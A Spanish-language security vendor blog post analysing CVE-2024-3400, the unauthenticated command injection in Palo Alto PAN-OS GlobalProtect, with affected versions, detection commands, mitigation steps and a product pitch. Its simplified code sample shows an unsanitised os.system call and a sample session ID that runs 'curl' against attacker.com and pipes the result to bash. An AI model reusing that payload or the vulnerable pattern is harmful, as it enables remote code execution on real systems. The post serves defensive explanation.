剣 KENSAI
Crítica CVE-2024-3400 Enero de 2026 · 9 min de lectura

CVE-2024-3400: inyección de comandos en Palo Alto PAN-OS — CVSS 10.0

CVE-2024-3400 es una vulnerabilidad de inyección de comandos del sistema operativo de máxima gravedad en la puerta de enlace GlobalProtect de Palo Alto Networks PAN-OS. Un atacante no autenticado puede ejecutar comandos arbitrarios del sistema operativo como root sin necesidad de interacción. Fue explotada por UTA0218 (probablemente patrocinado por un Estado) antes de su divulgación.


10.0
CRÍTICA (MÁX.)
AtributoValor
ID de CVECVE-2024-3400
Vector CVSSAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-77: inyección de comandos del sistema operativo
Publicada12 de abril de 2024
ExplotaciónActiva — CISA KEV, explotación por parte de un Estado nación

¿Qué es CVE-2024-3400?

CVE-2024-3400 afecta a la funcionalidad GlobalProtect de Palo Alto Networks PAN-OS. Cuando GlobalProtect está configurado como puerta de enlace o portal, un atacante remoto no autenticado puede inyectar comandos arbitrarios del sistema operativo que se ejecutan con privilegios de root en el dispositivo de firewall.

La combinación de factores —sin necesidad de autenticación, accesible desde la red, cambio de ámbito e impacto máximo sobre la confidencialidad, la integridad y la disponibilidad— da como resultado una puntuación CVSS perfecta de 10.0. Entre los proveedores de firewalls, solo unas pocas vulnerabilidades han recibido esta puntuación.

🚨 Explotación por parte de un Estado nación antes de que el parche estuviera disponible

Volexity descubrió esta vulnerabilidad mientras respondía a un incidente en el que UTA0218, un sofisticado actor de amenazas, había desplegado una novedosa puerta trasera en Python llamada UPSTYLE en dispositivos PAN-OS comprometidos. El atacante utilizó el firewall como punto de pivote para acceder a redes internas, robar credenciales de Active Directory y exfiltrar datos confidenciales. Volexity estima que la explotación comenzó a finales de marzo de 2024, semanas antes de que Palo Alto fuera notificado.

Sistemas afectados

Versión de PAN-OSAfectada (GlobalProtect habilitado)Versión corregida
PAN-OS 11.1< 11.1.2-h311.1.2-h3+
PAN-OS 11.0< 11.0.4-h111.0.4-h1+
PAN-OS 10.2< 10.2.9-h110.2.9-h1+
PAN-OS 10.1< 10.1.14-h410.1.14-h4+

Requisito previo: debe estar configurada una puerta de enlace o un portal de GlobalProtect (show global-protect-gateway current-user devuelve resultados). Las organizaciones que no hayan configurado GlobalProtect no están afectadas.

Análisis técnico

El punto de inyección se encuentra en el código de gestión de sesiones de GlobalProtect. Cuando se establece una sesión de GlobalProtect, determinados atributos de la sesión se escriben en archivos temporales del firewall. El código que construye la ruta de estos archivos de sesión no depura correctamente el identificador de sesión, que está parcialmente controlado por el atacante.

# Construcción simplificada de la ruta de archivo vulnerable
SESSION_ID = request.cookie["SESSID"]  # Controlado por el atacante
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}")  # Inyección de comandos aquí

# El atacante crea un ID de sesión que contiene metacaracteres del shell:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"

La puerta trasera UPSTYLE instalada por UTA0218 utilizaba un novedoso mecanismo de persistencia: un script de Python que supervisaba los registros de acceso del servidor web en busca de patrones de solicitud específicos (que contenían un comando cifrado), ejecutaba los comandos y después restauraba el contenido original del archivo para eliminar las pruebas de la actividad.

Actividad posterior a la explotación (UTA0218)

Volexity documentó la siguiente secuencia posterior a la explotación realizada por actores de Estados nación:

Detección

Análisis de registros de PAN-OS

# Buscar artefactos de la puerta trasera UPSTYLE
find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null

# Tráfico sospechoso en los registros de GlobalProtect
grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log

# Archivos del sistema modificados (UPSTYLE los modifica y después los restaura)
# Comprobar tiempos de acceso recientes en los archivos del servidor web
find /var/appweb -atime -7 -name "*.php" -o -name "*.py"

Consultas para la búsqueda de amenazas

Mitigación

  1. Aplique el parche inmediatamente: instale las versiones de corrección urgente indicadas anteriormente. Se trata de una vulnerabilidad CVSS 10.0 explotada activamente; ningún retraso es aceptable.
  2. Solución provisional con Threat Prevention: en dispositivos sin parchear, habilite Threat Prevention con perfiles de seguridad en las interfaces de GlobalProtect. Palo Alto proporcionó firmas específicas de ID de amenazas.
  3. Deshabilite GlobalProtect si no es necesario: las organizaciones que no utilicen activamente GlobalProtect pueden deshabilitar temporalmente esta funcionalidad como solución provisional.
  4. Audite los archivos del firewall: ejecute el script proporcionado por Palo Alto para buscar UPSTYLE y otros artefactos posteriores a la explotación.
  5. Rote todas las credenciales: toda credencial almacenada en la configuración del firewall (certificados de VPN, credenciales de vinculación LDAP, etc.) debe considerarse comprometida.

💡 Directiva de emergencia de CISA: CISA emitió la Directiva de Emergencia 24-03, que exigía a todas las agencias federales de EE. UU. aplicar los parches o las medidas de mitigación antes del 19 de abril de 2024. La urgencia refleja la gravedad y la explotación activa por parte de sofisticados actores de amenazas.

Capacidad de detección de KENSAI

¿Está su infraestructura de Palo Alto expuesta a CVE-2024-3400?

KENSAI identifica al instante los dispositivos PAN-OS expuestos a Internet que son vulnerables a la inyección de comandos. No espere a que los actores de amenazas los encuentren primero.

Analice ahora su perímetro →

Artículos relacionados

Industrialización del malware asistida por AI: Transparent Redirigiendo... KENSAI frente a SonarQube: para 2025...